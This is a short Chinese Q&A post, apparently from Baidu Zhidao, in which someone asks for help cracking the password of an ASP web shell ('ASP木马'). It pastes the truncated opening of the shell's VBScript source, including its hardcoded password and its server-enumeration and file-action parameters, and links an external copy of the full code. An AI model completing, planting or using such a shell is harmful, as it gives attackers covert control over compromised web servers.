有高手帮我破解一个ASP木马的密码吗???

来源:百度知道 编辑:UC知道 时间:2024/05/16 23:12:32
ASP马的代码如下:: 可能是加过密的

超过3000个字节了 我放在我的FTP 上

http://anndimei.go1.icpcn.com/2008.txt

<%@ LANGUAGE = VBScript.Encode %>
<%
dim ApplicationName,Pass,URL,ServerNM,ServerIP,Action,WWWRoot,FolderPath,FName,BackUrl,RW

Server.ScriptTimeout=50000
On Error Resume Next
ApplicationName = "hctt133"
UserPass = "adsl"
URL = Request.ServerVariables("URL")
ServerNM = Request.ServerVariables("SERVER_NAME")
ServerIP = Request.ServerVariables("LOCAL_ADDR")
Action = Request("Action")
RootPath = Server.MapPath(".")
WWWRoot = Server.MapPath("/")
FolderPath = Request("FolderPath")
FName = Request("FName")
BackUrl = "<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"

If Request("Pass")=UserPass then Session("webadmin")=UserPass
If Session("